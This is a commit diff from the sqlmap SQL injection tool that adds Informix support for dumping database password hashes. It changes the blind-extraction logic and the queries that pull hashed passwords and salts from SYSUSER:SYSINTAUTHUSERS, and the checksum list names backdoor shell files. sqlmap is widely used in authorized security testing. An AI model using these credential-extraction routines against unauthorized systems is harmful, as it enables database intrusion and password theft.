One more commit for #552 (--passwords)

2024-11-22 09:36:35 +03:00 · 2016-09-26 16:38:03 +02:00 · 2016-09-26 16:38:03 +02:00 · 978f56ad10
commit 978f56ad10
parent aa0b97b562
4 changed files with 25 additions and 19 deletions
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@ -19,7 +19,7 @@ from lib.core.enums import OS
 from lib.core.revision import getRevisionNumber

 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.0.9.33"
+VERSION = "1.0.9.34"
 REVISION = getRevisionNumber()
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
--- a/plugins/generic/users.py
+++ b/plugins/generic/users.py
@ -252,22 +252,25 @@ class Users:
                    if user in retrievedUsers:
                        continue

-                    infoMsg = "fetching number of password hashes "
-                    infoMsg += "for user '%s'" % user
-                    logger.info(infoMsg)
-
-                    if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
-                        query = rootQuery.blind.count2 % user
+                    if Backend.isDbms(DBMS.INFORMIX):
+                        count = 1
                    else:
-                        query = rootQuery.blind.count % user
+                        infoMsg = "fetching number of password hashes "
+                        infoMsg += "for user '%s'" % user
+                        logger.info(infoMsg)

-                    count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
+                        if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
+                            query = rootQuery.blind.count2 % user
+                        else:
+                            query = rootQuery.blind.count % user

-                    if not isNumPosStrValue(count):
-                        warnMsg = "unable to retrieve the number of password "
-                        warnMsg += "hashes for user '%s'" % user
-                        logger.warn(warnMsg)
-                        continue
+                        count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
+
+                        if not isNumPosStrValue(count):
+                            warnMsg = "unable to retrieve the number of password "
+                            warnMsg += "hashes for user '%s'" % user
+                            logger.warn(warnMsg)
+                            continue

                    infoMsg = "fetching password hashes for user '%s'" % user
                    logger.info(infoMsg)
@ -283,11 +286,14 @@ class Users:
                                query = rootQuery.blind.query2 % (user, index, user)
                            else:
                                query = rootQuery.blind.query % (user, index, user)
+                        elif Backend.isDbms(DBMS.INFORMIX):
+                            query = rootQuery.blind.query % (user,)
                        else:
                            query = rootQuery.blind.query % (user, index)

                        password = unArrayizeValue(inject.getValue(query, union=False, error=False))
                        password = parsePasswordHash(password)
+
                        passwords.append(password)

                    if passwords:
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@ -45,7 +45,7 @@ e60456db5380840a586654344003d4e6  lib/core/readlineng.py
 5ef56abb8671c2ca6ceecb208258e360  lib/core/replication.py
 99a2b496b9d5b546b335653ca801153f  lib/core/revision.py
 7c15dd2777af4dac2c89cab6df17462e  lib/core/session.py
-55a79706107d51efb7ed0a771f80e58e  lib/core/settings.py
+2d29c71e80997841c3acb700de58f331  lib/core/settings.py
 7af83e4f18cab6dff5e67840eb65be80  lib/core/shell.py
 23657cd7d924e3c6d225719865855827  lib/core/subprocessng.py
 0bc2fae1dec18cdd11954b22358293f2  lib/core/target.py
@ -213,7 +213,7 @@ cc9c82cfffd8ee9b25ba3af6284f057e  plugins/generic/__init__.py
 7b3e044a7fca497278d79883697089b7  plugins/generic/search.py
 73f8d047dbbcff307d62357836e382e6  plugins/generic/syntax.py
 da3ebc20998af02e3d952d0417a67792  plugins/generic/takeover.py
-078434ac78aaa539526031ebdd5556f2  plugins/generic/users.py
+d35f994664fb7a7fcee656633dfb31ed  plugins/generic/users.py
 cc9c82cfffd8ee9b25ba3af6284f057e  plugins/__init__.py
 b04db3e861edde1f9dd0a3850d5b96c8  shell/backdoor.asp_
 158bfa168128393dde8d6ed11fe9a1b8  shell/backdoor.aspx_
@ -455,4 +455,4 @@ a279656ea3fcb85c727249b02f828383  xml/livetests.xml
 96adb9bfbab867d221974d3ddb303cb6  xml/payloads/stacked_queries.xml
 c8b152ecebf04ec997e52c6c78cbd488  xml/payloads/time_blind.xml
 033b39025e8ee0f302935f6db3a39e77  xml/payloads/union_query.xml
-3365321fc0217e148c2fa8a217cbfc5e  xml/queries.xml
+1587a02322a96ac48973e782d6fedf73  xml/queries.xml
--- a/xml/queries.xml
+++ b/xml/queries.xml
@ -749,8 +749,8 @@
            <blind query="SELECT SKIP %d LIMIT 1 USERNAME FROM SYSUSERS ORDER BY USERNAME" count="SELECT COUNT(USERNAME) FROM SYSUSERS"/>
        </users>
        <passwords>
-            <inband query="SELECT USERNAME,HASHED_PASSWORD,SALT FROM SYSUSER:SYSINTAUTHUSERS" condition="USERNAME"/>
-            <blind query="SELECT HASHED_PASSWORD FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'" query2="SELECT SALT FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'"/>
+            <inband query="SELECT USERNAME,HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS" condition="USERNAME"/>
+            <blind query="SELECT HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'"/>
        </passwords>
        <privileges>
            <inband query="SELECT USERNAME,USERTYPE FROM SYSUSERS" condition="USERNAME"/>